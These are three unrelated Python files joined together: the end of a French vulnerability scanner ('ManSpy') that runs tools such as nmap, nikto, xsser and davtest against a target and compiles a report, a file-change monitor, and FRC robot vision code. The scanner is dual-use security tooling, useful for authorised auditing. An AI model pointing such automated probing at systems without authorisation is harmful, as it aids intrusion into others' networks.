"Limiter les informations de la bannière au monde extérieur à partir du service de publication. Plus d'informations sur la réduction de cette vulnérabilité peuvent être trouvées ici. Https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed"],
[42, "Un attaquant a des chances de manipuler des fichiers sur le serveur Web.",
"Il est recommandé de désactiver les méthodes HTTP PUT et DEL si vous n'utilisez pas de services d'API REST. Les ressources suivantes vous aident à désactiver ces méthodes. Http://www.techstacks.com/howto/disable-http- methods-in-tomcat.html https://docs.oracle.com/cd/E19857-01/820-5627/gghwc/index.html https://developer.ibm.com/answers/questions/321629/how- désactiver-méthodes-http-head-put-delete-option / "],
[43, "Les attaquants essaient d'en savoir plus sur la cible grâce à la quantité d'informations exposées dans les en-têtes. Un attaquant peut savoir quel type de pile technologique une application Web met en valeur et de nombreuses autres informations.",
"La capture de bannières devrait être restreinte et l'accès aux services de l'extérieur devrait être réduit au minimum."],
[44, "Un attaquant qui parviendrait à exploiter cette vulnérabilité pourrait lire des données, telles que l'état d'affichage, qui était chiffré par le serveur. Cette vulnérabilité peut également être utilisée pour la falsification de données, qui, si elle est exploitée correctement, peut être utilisée pour le déchiffrement et la sauvegarde. altérer les données cryptées par le serveur. ",
"Microsoft a publié une série de correctifs sur son site Web afin d'atténuer ce problème. Les informations requises pour corriger cette vulnérabilité peuvent être déduites de cette ressource. Https://docs.microsoft.com/en-us/security-updates/securitybulletins/ 2010 / ms10-070 "],
[45, "Tout serveur Web obsolète peut contenir plusieurs vulnérabilités, car leur assistance aurait pris fin. Un attaquant peut utiliser cette opportunité pour exploiter ses attaques.",
"Il est vivement recommandé de mettre à niveau le serveur Web vers la dernière version disponible."],
[46, "Les pirates seront en mesure de manipuler les URL facilement via une requête GET / POST. Ils pourront injecter facilement plusieurs vecteurs d'attaque dans l'URL et être en mesure de surveiller la réponse",
"En garantissant des techniques de désinfection appropriées et en utilisant des pratiques de codage sécurisées, il sera impossible à l'attaquant de pénétrer à travers. La ressource suivante donne un aperçu détaillé des pratiques de codage sécurisées. Https://wiki.sei.cmu.edu/confluence/display/ seccode / Top + 10 + Secure + Coding + Practices "],
[47, "Puisque l'attaquant a connaissance du type de serveur utilisé par la cible, il pourra lancer un exploit ciblé pour la version en question. Il peut également essayer de s'authentifier à l'aide des informations d'identification par défaut.",
"Des correctifs de sécurité opportuns pour le système doivent être installés. Les informations d'identification par défaut doivent être modifiées. Si possible, les informations de la bannière peuvent être modifiées pour tromper l'attaquant. La ressource suivante fournit des informations supplémentaires sur la sécurisation de votre système. Http: // kb.bodhost.com/secure-database-server/ "],
[48, "Les attaquants peuvent lancer des exploits distants pour faire planter le service ou utiliser des outils tels que ncrack pour essayer de forcer brute le mot de passe sur la cible.",
"Il est recommandé de bloquer le service vers le monde extérieur et de le rendre accessible uniquement via un ensemble d'adresses IP autorisées uniquement. Cette ressource fournit des informations sur les risques, ainsi que sur les étapes permettant de bloquer le service. Https: / /www.perspectiverisk.com/remote-desktop-service-vulnerabilities/ "],
[49, "Les pirates seront en mesure de lire les chaînes de la communauté via le service et d'énumérer toute une information de la cible. De plus, il existe plusieurs vulnérabilités d'exécution de code à distance et de déni de service liées aux services SNMP.",
"Utilisez un pare-feu pour bloquer les ports du monde extérieur. L'article suivant donne un aperçu du verrouillage du service SNMP. Https://www.techrepublic.com/article/lock-it-down-dont-allow-snmp-to -compromise-network-security / "],
[50, "Les attaquants pourront trouver les journaux et les informations d'erreur générés par l'application. Ils pourront également voir les codes d'état générés sur l'application. En combinant toutes ces informations, l'attaquant sera en mesure d'exploiter une attaque.",
"En limitant l'accès à l'application de journalisation du monde extérieur, cela sera amplement suffisant pour atténuer cette faiblesse."],
[51, "Les cybercriminels ciblent principalement ce service car il leur est très facile de mener une attaque à distance en exécutant des exploits. WannaCry Ransomware par exemple.",
"Exposer le service SMB au monde extérieur est une mauvaise idée. Il est recommandé d’installer les derniers correctifs pour le service afin de ne pas compromettre. La ressource suivante fournit des informations détaillées sur les concepts de SMB Hardening. Https: //kb.iweb. com / hc / fr-fr / articles / 115000274491-Sécurisation-Windows-SMB-et-NetBios-NetBT-Services "]
]
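# Illustrative sketch (not used by the scanner): the remediation text for
# entry 39 above recommends validating input and never splicing user data into
# SQL strings. A minimal example of the parameterised-query style it refers
# to, using the standard sqlite3 module and a hypothetical "users" table:
def _example_parameterized_query(db_path, username):
    import sqlite3
    conn = sqlite3.connect(db_path)
    try:
        cur = conn.cursor()
        # The "?" placeholder lets the driver bind the value safely instead of
        # concatenating it into the query, which is what enables SQL injection.
        cur.execute("SELECT id, email FROM users WHERE name = ?", (username,))
        return cur.fetchall()
    finally:
        conn.close()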
precheck_outils = [
["wapiti"], ["whatweb"], ["nmap"], ["golismero"], ["host"], ["wget"], ["uniscan"], ["wafw00f"], ["dirb"], ["davtest"], ["theharvester"], ["xsser"], ["dnsrecon"],["fierce"], ["dnswalk"], ["mansour"], ["whois"], ["sslyze"], ["lbd"], ["golismero"], ["dnsenum"],["dmitry"], ["davtest"], ["nikto"], ["dnsmap"]
]
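# The parallel tool lists are zipped together, shuffled as one unit and then
# unzipped again, so every run probes the tools in a random order while keeping
# each tool's name, command, response text and status entry aligned.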
scan_shuffle = list(zip(noms_outils, cmd_outils, rep_outil, outils_status))
random.shuffle(scan_shuffle)
noms_outils, cmd_outils, rep_outil, outils_status = zip(*scan_shuffle)
tool_checks = (len(noms_outils) + len(rep_outil) + len(outils_status)) / 3
tool = 0
runTest = 1
arg1 = 0
arg2 = 1
arg3 = 2
arg4 = 3
arg5 = 4
arg6 = 5
# Detectevul
rs_vul_list = list()
rs_vul_num = 0
rs_vul = 0
rs_total_elapsed = 0
rs_avail_tools = 0
rs_skipped_checks = 0
if len(sys.argv) == 1 :
logo()
helper()
else:
target = sys.argv[1].lower()
# First, check internet connectivity...
ms_internet_dispo = verifier_internet()
if ms_internet_dispo == 0:
print ("\t"+ bcolors.BG_ERR_TXT + "Il semble y avoir un problème de connexion à Internet. Veuillez réessayer ou plus tard." +bcolors.ENDC)
sys.exit(1)
elif target == '--help' or target == '-h' or target == '--h':
logo()
helper()
sys.exit(1)
else:
target = url_maker(target)
os.system('rm te* > /dev/null 2>&1') # Clearing previous scan temp files
os.system('clear')
os.system('setterm -cursor off')
logo()
print bcolors.BG_HEAD_TXT+"[ Vérification des outils d'analyses disponibles... Initiée. ]"+bcolors.ENDC
indispo_outils = 0
indispo_outils_noms = list()
while (rs_avail_tools < len(precheck_outils)):
precmd = str(precheck_outils[rs_avail_tools][arg1])
try:
p = subprocess.Popen([precmd], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE,shell=True)
output, err = p.communicate()
val = output + err
except:
print "\t"+bcolors.BG_ERR_TXT+"ManSpy a été arreté d'une manière brusque...!!"+bcolors.ENDC
sys.exit(1)
if "not found" in val:
print "\t"+bcolors.TBLUE+precheck_outils[rs_avail_tools][arg1]+bcolors.ENDC+bcolors.BADFAIL+"...indisponible."+bcolors.ENDC
for scanner_index, scanner_val in enumerate(noms_outils):
if scanner_val[2] == precheck_outils[rs_avail_tools][arg1]:
scanner_val[3] = 0 # disable the scanner since it is not available.
indispo_outils_noms.append(precheck_outils[rs_avail_tools][arg1])
indispo_outils = indispo_outils + 1
else:
print "\t"+bcolors.TBLUE+precheck_outils[rs_avail_tools][arg1]+bcolors.ENDC+bcolors.TGREEN+"...disponible."+bcolors.ENDC
rs_avail_tools = rs_avail_tools + 1
clear()
indispo_outils_noms = list(set(indispo_outils_noms))
if indispo_outils == 0:
print "\t"+bcolors.TGREEN+"Tous les outils d'analyse sont disponibles. Tous les contrôles de vulnérabilité seront effectués par ManSpy."+bcolors.ENDC
else:
print "\t"+bcolors.WARNING+"Certains de ces outils "+bcolors.BADFAIL+str(indispo_outils_noms)+bcolors.ENDC+bcolors.WARNING+" sont indisponibles. ManSpy peut toujours effectuer des tests en excluant ces outils des tests. Veuillez installer ces outils pour utiliser pleinement les fonctionnalités de ManSpy."+bcolors.ENDC
print bcolors.BG_ENDL_TXT+"[ Vérification des outils d'analyses disponibles... Terminé. ]"+bcolors.ENDC
print "\n"
print bcolors.BG_HEAD_TXT+"[Phase d'analyse préliminaire lancée ... chargée "+str(tool_checks)+" vulnerability checks. ]"+bcolors.ENDC
#while (tool < 1):
while(tool < len(noms_outils)):
print "["+outils_status[tool][arg3]+outils_status[tool][arg4]+"] Déploiement "+str(tool+1)+"/"+str(tool_checks)+" | "+bcolors.TBLUE+noms_outils[tool][arg2]+bcolors.ENDC,
if noms_outils[tool][arg4] == 0:
print bcolors.WARNING+"...Outil d'analyse non disponible. sauté le test automatiquement..."+bcolors.ENDC
rs_skipped_checks = rs_skipped_checks + 1
tool = tool + 1
continue
spinner.start()
scan_start = time.time()
temp_file = "temp_"+noms_outils[tool][arg1]
cmd = cmd_outils[tool][arg1]+target+cmd_outils[tool][arg2]+" > "+temp_file+" 2>&1"
try:
subprocess.check_output(cmd, shell=True)
except KeyboardInterrupt:
runTest = 0
except:
runTest = 1
if runTest == 1:
spinner.stop()
scan_stop = time.time()
elapsed = scan_stop - scan_start
rs_total_elapsed = rs_total_elapsed + elapsed
print bcolors.TBLUE+"\b...Terminé en "+display_time(int(elapsed))+bcolors.ENDC+"\n"
clear()
rs_tool_output_file = open(temp_file).read()
if outils_status[tool][arg2] == 0:
if outils_status[tool][arg1].lower() in rs_tool_output_file.lower():
#print "\t"+ vul_info(rep_outil[tool][arg2]) + bcolors.BADFAIL +" "+ rep_outil[tool][arg1] + bcolors.ENDC
vul_as_info(tool,rep_outil[tool][arg2],rep_outil[tool][arg3])
rs_vul_list.append(noms_outils[tool][arg1]+"*"+noms_outils[tool][arg2])
else:
if any(i in rs_tool_output_file for i in outils_status[tool][arg6]):
m = 1 # do nothing: a known false-positive marker was found in the output.
else:
#print "\t"+ vul_info(rep_outil[tool][arg2]) + bcolors.BADFAIL +" "+ rep_outil[tool][arg1] + bcolors.ENDC
vul_as_info(tool,rep_outil[tool][arg2],rep_outil[tool][arg3])
rs_vul_list.append(noms_outils[tool][arg1]+"*"+noms_outils[tool][arg2])
else:
runTest = 1
spinner.stop()
scan_stop = time.time()
elapsed = scan_stop - scan_start
rs_total_elapsed = rs_total_elapsed + elapsed
print bcolors.TBLUE+"\b\b\b\b...Interrompu dans "+display_time(int(elapsed))+bcolors.ENDC+"\n"
clear()
print "\t"+bcolors.WARNING + "Test ignoré. Effectuer Suivant. Appuyez sur Ctrl + Z pour quitter ManSpy." + bcolors.ENDC
rs_skipped_checks = rs_skipped_checks + 1
tool=tool+1
print bcolors.BG_ENDL_TXT+"[ l'analyse préliminaire est terminée.. ]"+bcolors.ENDC
print "\n"
#################### Reporting and documentation phase ###########################
print bcolors.BG_HEAD_TXT+"[ Report generation phase initiated. ]"+bcolors.ENDC
if len(rs_vul_list)==0:
print "\t"+bcolors.TGREEN+"Aucune vulnérabilité détectée."+bcolors.ENDC
else:
with open("MS-Rapport-de-vulnérabilite", "a") as report:
while(rs_vul < len(rs_vul_list)):
vuln_info = rs_vul_list[rs_vul].split('*')
report.write(vuln_info[arg2])
report.write("\n------------------------\n\n")
temp_report_name = "temp_"+vuln_info[arg1]
with open(temp_report_name, 'r') as temp_report:
data = temp_report.read()
report.write(data)
report.write("\n\n")
temp_report.close()
rs_vul = rs_vul + 1
print "\tRapport de vulnérabilité complet pour "+bcolors.TBLUE+target+bcolors.ENDC+" named "+bcolors.TGREEN+"`MS-Rapport-de-vulnérabilite`"+bcolors.ENDC+" est disponible dans le même répertoire que RapidScan se trouve."
report.close()
# Write every scan output file to the MS-Debug log for debugging purposes.
for file_index, file_name in enumerate(noms_outils):
with open("MS-Debug-ScLog", "a") as report:
try:
with open("temp_"+file_name[arg1], 'r') as temp_report:
data = temp_report.read()
report.write(file_name[arg2])
report.write("\n------------------------\n\n")
report.write(data)
report.write("\n\n")
temp_report.close()
except:
break
report.close()
print "\tNombre total de vulnérabilité controles : "+bcolors.BOLD+bcolors.TGREEN+str(len(noms_outils))+bcolors.ENDC
print "\tNombre total de vérifications de vulnérabilité ignorées: "+bcolors.BOLD+bcolors.WARNING+str(rs_skipped_checks)+bcolors.ENDC
print "\tNombre total de vulnérabilités détectées : "+bcolors.BOLD+bcolors.BADFAIL+str(len(rs_vul_list))+bcolors.ENDC
print "\tTemps total écoulé pour l'analyse : "+bcolors.BOLD+bcolors.TBLUE+display_time(int(rs_total_elapsed))+bcolors.ENDC
print "\n"
print "\tÀ des fins de débogage, vous pouvez afficher la sortie complète générée par tous les outils nommés"+bcolors.TBLUE+"`MS-Debug-ScLog`"+bcolors.ENDC+" sous le même répertoire."
print bcolors.BG_ENDL_TXT+"[ La phase de génération de rapports est terminée. ]"+bcolors.ENDC
os.system('setterm -cursor on')
os.system('rm te* > /dev/null 2>&1') # Clearing the scan temp files
|
watcher.py
|
import time
import threading
import logging
class Monitor(object):
def __init__(self):
self.handlers = {}
def file_changed(self, filename):
logging.getLogger(__name__).info('File changed %s', filename)
for v in self.handlers[filename]:
v[0](filename, *v[1:])
def monitor(self, filename, handler, *args):
if filename not in self.handlers:
self._monitor(filename)
self.handlers.setdefault(filename, set()).add((handler,) + args)
class DummyMonitor(Monitor):
def __init__(self):
Monitor.__init__(self)
self.files = set()
def _monitor(self, filename):
self.files.add(filename)
def boo(self):
map(self.file_changed, self.files)
class FallbackMonitor(Monitor):
def __init__(self):
Monitor.__init__(self)
self.files = {}
self.timeout = 5
def start(self):
t = threading.Thread(target=self.watch_for_changes)
t.daemon = True
t.start()
def _monitor(self, filename):
from os.path import getmtime
if filename not in self.files:
logging.getLogger(__name__).info('Monitor changes for %s', filename)
self.files[filename] = getmtime(filename)
def watch_for_changes(self):
from os.path import getmtime
while True:
for f, mtime in self.files.iteritems():
new_mtime = getmtime(f)
if new_mtime != mtime:
self.file_changed(f)
self.files[f] = new_mtime
time.sleep(self.timeout)
def get_monitor():
return FallbackMonitor()
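# Minimal usage sketch (not part of the module): poll a hypothetical
# "config.ini" (assumed to exist) every few seconds and log whenever it changes.
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO)

    def reload_config(path):
        logging.getLogger(__name__).info('Detected change in %s', path)

    mon = get_monitor()
    mon.monitor('config.ini', reload_config)
    mon.start()
    while True:
        time.sleep(1)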
|
vision.py
|
#!/usr/bin/env python3
# R-pi computer vision
# Credit to Screaming Chickens 3997
# This is meant to be used in conjunction with WPILib Raspberry Pi image: https://github.com/wpilibsuite/FRCVision-pi-gen
import json
import time
import sys
from threading import Thread
from cscore import CameraServer, VideoSource
from networktables import NetworkTablesInstance
import cv2
import numpy as np
from networktables import NetworkTables
import math
########### SET RESOLUTION TO 256x144 !!!! ############
# import the necessary packages
import datetime
#Class to examine Frames per second of camera stream. Currently not used.
class FPS:
def __init__(self):
# store the start time, end time, and total number of frames
# that were examined between the start and end intervals
self._start = None
self._end = None
self._numFrames = 0
def start(self):
# start the timer
self._start = datetime.datetime.now()
return self
def stop(self):
# stop the timer
self._end = datetime.datetime.now()
def update(self):
# increment the total number of frames examined during the
# start and end intervals
self._numFrames += 1
def elapsed(self):
# return the total number of seconds between the start and
# end interval
return (self._end - self._start).total_seconds()
def fps(self):
# compute the (approximate) frames per second
return self._numFrames / self.elapsed()
# class that runs separate thread for showing video,
class VideoShow:
"""
Class that continuously shows a frame using a dedicated thread.
"""
def __init__(self, imgWidth, imgHeight, cameraServer, frame=None, name='stream'):
self.outputStream = cameraServer.putVideo(name, imgWidth, imgHeight)
self.frame = frame
self.stopped = False
def start(self):
Thread(target=self.show, args=()).start()
return self
def show(self):
while not self.stopped:
self.outputStream.putFrame(self.frame)
def stop(self):
self.stopped = True
def notifyError(self, error):
self.outputStream.notifyError(error)
class WebcamVideoStream:
def __init__(self, camera, cameraServer, frameWidth, frameHeight, name="WebcamVideoStream"):
# initialize the video camera stream and read the first frame
# from the stream
#Automatically sets exposure to 0 to track tape
self.webcam = camera
self.webcam.setExposureManual(0)
#Some booleans so that we don't keep setting exposure over and over to the same value
self.autoExpose = False
self.prevValue = self.autoExpose
#Make a blank image to write on
self.img = np.zeros(shape=(frameWidth, frameHeight, 3), dtype=np.uint8)
#Gets the video
self.stream = cameraServer.getVideo(camera = camera)
(self.timestamp, self.img) = self.stream.grabFrame(self.img)
# initialize the thread name
self.name = name
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
t = Thread(target=self.update, name=self.name, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
#Boolean logic we don't keep setting exposure over and over to the same value
if self.autoExpose:
self.webcam.setExposureAuto()
else:
self.webcam.setExposureManual(0)
#gets the image and timestamp from cameraserver
(self.timestamp, self.img) = self.stream.grabFrame(self.img)
def read(self):
# return the frame most recently read
return self.timestamp, self.img
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
def getError(self):
return self.stream.getError()
###################### PROCESSING OPENCV ################################
#Angles in radians
#image size ratioed to 16:9
image_width = 256
image_height = 144
#Lifecam 3000 from datasheet
#Datasheet: https://dl2jx7zfbtwvr.cloudfront.net/specsheets/WEBC1010.pdf
diagonalView = math.radians(68.5)
#16:9 aspect ratio
horizontalAspect = 16
verticalAspect = 9
#Reasons for using diagonal aspect is to calculate horizontal field of view.
diagonalAspect = math.hypot(horizontalAspect, verticalAspect)
#Calculations: http://vrguy.blogspot.com/2013/04/converting-diagonal-field-of-view-and.html
horizontalView = math.atan(math.tan(diagonalView/2) * (horizontalAspect / diagonalAspect)) * 2
verticalView = math.atan(math.tan(diagonalView/2) * (verticalAspect / diagonalAspect)) * 2
#Focal Length calculations: https://docs.google.com/presentation/d/1ediRsI-oR3-kwawFJZ34_ZTlQS2SDBLjZasjzZ-eXbQ/pub?start=false&loop=false&slide=id.g12c083cffa_0_165
H_FOCAL_LENGTH = image_width / (2*math.tan((horizontalView/2)))
V_FOCAL_LENGTH = image_height / (2*math.tan((verticalView/2)))
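# Rough sanity check (approximate numbers, not authoritative): with the 68.5 degree
# diagonal FOV above, horizontalView works out to about 61 degrees and verticalView
# to about 37 degrees, so for a 256x144 frame both focal lengths come out to
# roughly 216 pixels.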
#blurs have to be odd
green_blur = 7
orange_blur = 27
# define range of green of retroreflective tape in HSV
lower_green = np.array([0,220,25])
upper_green = np.array([101, 255, 255])
#define range of orange from cargo ball in HSV
lower_orange = np.array([0,193,92])
upper_orange = np.array([23, 255, 255])
#Flip image if camera mounted upside down
def flipImage(frame):
return cv2.flip( frame, -1 )
#Blurs frame
def blurImg(frame, blur_radius):
img = frame.copy()
blur = cv2.blur(img,(blur_radius,blur_radius))
return blur
# Masks the video based on a range of hsv colors
# Takes in a frame, range of color, and a blurred frame, returns a masked frame
def threshold_video(lower_color, upper_color, blur):
# Convert BGR to HSV
hsv = cv2.cvtColor(blur, cv2.COLOR_BGR2HSV)
# hold the HSV image to get only red colors
mask = cv2.inRange(hsv, lower_color, upper_color)
# Returns the masked image
return mask
# Finds the tape targets from the masked image and displays them on original stream + network tables
def findTargets(frame, mask):
# Finds contours
_, contours, _ = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_TC89_KCOS)
# Take each frame
# Gets the shape of video
screenHeight, screenWidth, _ = frame.shape
# Gets center of height and width
centerX = (screenWidth / 2) - .5
centerY = (screenHeight / 2) - .5
# Copies frame and stores it in image
image = frame.copy()
# Processes the contours, takes in (contours, output_image, (centerOfImage)
if len(contours) != 0:
image = findTape(contours, image, centerX, centerY)
else:
# pushes that it doesn't see vision target to network tables
networkTable.putBoolean("tapeDetected", False)
# Shows the contours overlayed on the original video
return image
# Finds the balls from the masked image and displays them on original stream + network tables
def findCargo(frame, mask):
# Finds contours
_, contours, _ = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_TC89_KCOS)
# Take each frame
# Gets the shape of video
screenHeight, screenWidth, _ = frame.shape
# Gets center of height and width
centerX = (screenWidth / 2) - .5
centerY = (screenHeight / 2) - .5
# Copies frame and stores it in image
image = frame.copy()
# Processes the contours, takes in (contours, output_image, (centerOfImage)
if len(contours) != 0:
image = findBall(contours, image, centerX, centerY)
else:
# pushes that it doesn't see cargo to network tables
networkTable.putBoolean("cargoDetected", False)
# Shows the contours overlayed on the original video
return image
# Draws Contours and finds center and yaw of orange ball
# centerX is center x coordinate of image
# centerY is center y coordinate of image
def findBall(contours, image, centerX, centerY):
screenHeight, screenWidth, channels = image.shape;
#Seen vision targets (correct angle, adjacent to each other)
cargo = []
if len(contours) > 0:
#Sort contours by area size (biggest to smallest)
cntsSorted = sorted(contours, key=lambda x: cv2.contourArea(x), reverse=True)
biggestCargo = []
for cnt in cntsSorted:
x, y, w, h = cv2.boundingRect(cnt)
aspect_ratio = float(w) / h
# Get moments of contour; mainly for centroid
M = cv2.moments(cnt)
# Get convex hull (bounding polygon on contour)
hull = cv2.convexHull(cnt)
# Calculate Contour area
cntArea = cv2.contourArea(cnt)
# Filters contours based off of size
if (checkBall(cntArea, aspect_ratio)):
### MOSTLY DRAWING CODE, BUT CALCULATES IMPORTANT INFO ###
# Gets the centroid of the contour
if M["m00"] != 0:
cx = int(M["m10"] / M["m00"])
cy = int(M["m01"] / M["m00"])
else:
cx, cy = 0, 0
if(len(biggestCargo) < 3):
##### DRAWS CONTOUR######
# Gets rotated bounding rectangle of contour
rect = cv2.minAreaRect(cnt)
# Creates box around that rectangle
box = cv2.boxPoints(rect)
# Not exactly sure
box = np.int0(box)
# Draws rotated rectangle
cv2.drawContours(image, [box], 0, (23, 184, 80), 3)
# Draws a vertical white line passing through center of contour
cv2.line(image, (cx, screenHeight), (cx, 0), (255, 255, 255))
# Draws a white circle at center of contour
cv2.circle(image, (cx, cy), 6, (255, 255, 255))
# Draws the contours
cv2.drawContours(image, [cnt], 0, (23, 184, 80), 1)
# Gets the (x, y) and radius of the enclosing circle of contour
(x, y), radius = cv2.minEnclosingCircle(cnt)
# Rounds center of enclosing circle
center = (int(x), int(y))
# Rounds radius of enclosing circle
radius = int(radius)
# Makes bounding rectangle of contour
rx, ry, rw, rh = cv2.boundingRect(cnt)
# Draws contour of bounding rectangle and enclosing circle in green
cv2.rectangle(image, (rx, ry), (rx + rw, ry + rh), (23, 184, 80), 1)
cv2.circle(image, center, radius, (23, 184, 80), 1)
# Appends important info to array
if not biggestCargo:
biggestCargo.append([cx, cy])
elif [cx, cy, cnt] not in biggestCargo:
biggestCargo.append([cx, cy])
# Check if there are cargo seen
if (len(biggestCargo) > 0):
#pushes that it sees cargo to network tables
networkTable.putBoolean("cargoDetected", True)
# Sorts targets based on x coords to break any angle tie
biggestCargo.sort(key=lambda x: math.fabs(x[0]))
closestCargo = min(biggestCargo, key=lambda x: (math.fabs(x[0] - centerX)))
xCoord = closestCargo[0]
finalTarget = calculateYaw(xCoord, centerX, H_FOCAL_LENGTH)
print("Yaw: " + str(finalTarget))
# Puts the yaw on screen
# Draws yaw of target + line where center of target is
cv2.putText(image, "Yaw: " + str(finalTarget), (40, 40), cv2.FONT_HERSHEY_COMPLEX, .6,
(255, 255, 255))
cv2.line(image, (int(xCoord), screenHeight), (int(xCoord), 0), (255, 0, 0), 2)
currentAngleError = finalTarget
#pushes cargo angle to network tables
networkTable.putNumber("cargoYaw", currentAngleError)
else:
#pushes that it doesn't see cargo to network tables
networkTable.putBoolean("cargoDetected", False)
cv2.line(image, (int(centerX), screenHeight), (int(centerX), 0), (255, 255, 255), 2)
return image
# Draws Contours and finds center and yaw of vision targets
# centerX is center x coordinate of image
# centerY is center y coordinate of image
def findTape(contours, image, centerX, centerY):
screenHeight, screenWidth, channels = image.shape;
#Seen vision targets (correct angle, adjacent to each other)
targets = []
if len(contours) >= 2:
#Sort contours by area size (biggest to smallest)
cntsSorted = sorted(contours, key=lambda x: cv2.contourArea(x), reverse=True)
biggestCnts = []
for cnt in cntsSorted:
# Get moments of contour; mainly for centroid
M = cv2.moments(cnt)
# Get convex hull (bounding polygon on contour)
hull = cv2.convexHull(cnt)
# Calculate Contour area
cntArea = cv2.contourArea(cnt)
# calculate area of convex hull
hullArea = cv2.contourArea(hull)
# Filters contours based off of size
if (checkContours(cntArea, hullArea)):
### MOSTLY DRAWING CODE, BUT CALCULATES IMPORTANT INFO ###
# Gets the centroid of the contour
if M["m00"] != 0:
cx = int(M["m10"] / M["m00"])
cy = int(M["m01"] / M["m00"])
else:
cx, cy = 0, 0
if(len(biggestCnts) < 13):
#### CALCULATES ROTATION OF CONTOUR BY FITTING ELLIPSE ##########
rotation = getEllipseRotation(image, cnt)
# Calculates yaw of contour (horizontal position in degrees)
yaw = calculateYaw(cx, centerX, H_FOCAL_LENGTH)
# Calculates pitch of contour (vertical position in degrees)
pitch = calculatePitch(cy, centerY, V_FOCAL_LENGTH)
##### DRAWS CONTOUR######
# Gets rotated bounding rectangle of contour
rect = cv2.minAreaRect(cnt)
# Creates box around that rectangle
box = cv2.boxPoints(rect)
# Not exactly sure
box = np.int0(box)
# Draws rotated rectangle
cv2.drawContours(image, [box], 0, (23, 184, 80), 3)
# Calculates yaw of contour (horizontal position in degrees)
yaw = calculateYaw(cx, centerX, H_FOCAL_LENGTH)
# Calculates pitch of contour (vertical position in degrees)
pitch = calculatePitch(cy, centerY, V_FOCAL_LENGTH)
# Draws a vertical white line passing through center of contour
cv2.line(image, (cx, screenHeight), (cx, 0), (255, 255, 255))
# Draws a white circle at center of contour
cv2.circle(image, (cx, cy), 6, (255, 255, 255))
# Draws the contours
cv2.drawContours(image, [cnt], 0, (23, 184, 80), 1)
# Gets the (x, y) and radius of the enclosing circle of contour
(x, y), radius = cv2.minEnclosingCircle(cnt)
# Rounds center of enclosing circle
center = (int(x), int(y))
# Rounds radius of enclosing circle
radius = int(radius)
# Makes bounding rectangle of contour
rx, ry, rw, rh = cv2.boundingRect(cnt)
boundingRect = cv2.boundingRect(cnt)
# Draws contour of bounding rectangle and enclosing circle in green
cv2.rectangle(image, (rx, ry), (rx + rw, ry + rh), (23, 184, 80), 1)
cv2.circle(image, center, radius, (23, 184, 80), 1)
# Appends important info to array
if not biggestCnts:
biggestCnts.append([cx, cy, rotation])
elif [cx, cy, rotation] not in biggestCnts:
biggestCnts.append([cx, cy, rotation])
# Sorts array based on coordinates (leftmost to rightmost) to make sure contours are adjacent
biggestCnts = sorted(biggestCnts, key=lambda x: x[0])
# Target Checking
for i in range(len(biggestCnts) - 1):
#Rotation of two adjacent contours
tilt1 = biggestCnts[i][2]
tilt2 = biggestCnts[i + 1][2]
#x coords of contours
cx1 = biggestCnts[i][0]
cx2 = biggestCnts[i + 1][0]
cy1 = biggestCnts[i][1]
cy2 = biggestCnts[i + 1][1]
# If contour angles are opposite
if (np.sign(tilt1) != np.sign(tilt2)):
centerOfTarget = math.floor((cx1 + cx2) / 2)
#ellipse negative tilt means rotated to right
#Note: if using rotated rect (min area rectangle)
# negative tilt means rotated to left
# If left contour rotation is tilted to the left then skip iteration
if (tilt1 > 0):
if (cx1 < cx2):
continue
# If left contour rotation is tilted to the left then skip iteration
if (tilt2 > 0):
if (cx2 < cx1):
continue
#Angle from center of camera to target (what you should pass into gyro)
yawToTarget = calculateYaw(centerOfTarget, centerX, H_FOCAL_LENGTH)
#Make sure no duplicates, then append
if not targets:
targets.append([centerOfTarget, yawToTarget])
elif [centerOfTarget, yawToTarget] not in targets:
targets.append([centerOfTarget, yawToTarget])
#Check if there are targets seen
if (len(targets) > 0):
# pushes that it sees vision target to network tables
networkTable.putBoolean("tapeDetected", True)
#Sorts targets based on x coords to break any angle tie
targets.sort(key=lambda x: math.fabs(x[0]))
finalTarget = min(targets, key=lambda x: math.fabs(x[1]))
# Puts the yaw on screen
#Draws yaw of target + line where center of target is
cv2.putText(image, "Yaw: " + str(finalTarget[1]), (40, 40), cv2.FONT_HERSHEY_COMPLEX, .6,
(255, 255, 255))
cv2.line(image, (finalTarget[0], screenHeight), (finalTarget[0], 0), (255, 0, 0), 2)
currentAngleError = finalTarget[1]
# pushes vision target angle to network tables
networkTable.putNumber("tapeYaw", currentAngleError)
else:
# pushes that it doesn't see vision target to network tables
networkTable.putBoolean("tapeDetected", False)
cv2.line(image, (round(centerX), screenHeight), (round(centerX), 0), (255, 255, 255), 2)
return image
# Checks if tape contours are worthy based off of contour area and (not currently) hull area
def checkContours(cntSize, hullSize):
return cntSize > (image_width / 6)
# Checks if ball contours are worthy based off of contour area and (not currently) hull area
def checkBall(cntSize, cntAspectRatio):
return (cntSize > (image_width / 2)) and (round(cntAspectRatio) == 1)
#Forgot how exactly it works, but it works!
def translateRotation(rotation, width, height):
if (width < height):
rotation = -1 * (rotation - 90)
if (rotation > 90):
rotation = -1 * (rotation - 180)
rotation *= -1
return round(rotation)
def calculateDistance(heightOfCamera, heightOfTarget, pitch):
heightOfTargetFromCamera = heightOfTarget - heightOfCamera
# Uses trig and pitch to find distance to target
'''
d = distance
h = height between camera and target
a = angle = pitch
tan a = h/d (opposite over adjacent)
d = h / tan a
.
/|
/ |
/ |h
/a |
camera -----
d
'''
distance = math.fabs(heightOfTargetFromCamera / math.tan(math.radians(pitch)))
return distance
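# Worked example (hypothetical numbers): with the camera lens 0.3 m off the
# floor, a target 0.7 m up and a measured pitch of 10 degrees, the distance is
# |0.4 / tan(10 deg)|, i.e. roughly 2.3 m.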
# Uses trig and focal length of camera to find yaw.
# Link to further explanation: https://docs.google.com/presentation/d/1ediRsI-oR3-kwawFJZ34_ZTlQS2SDBLjZasjzZ-eXbQ/pub?start=false&loop=false&slide=id.g12c083cffa_0_298
def calculateYaw(pixelX, centerX, hFocalLength):
yaw = math.degrees(math.atan((pixelX - centerX) / hFocalLength))
return round(yaw)
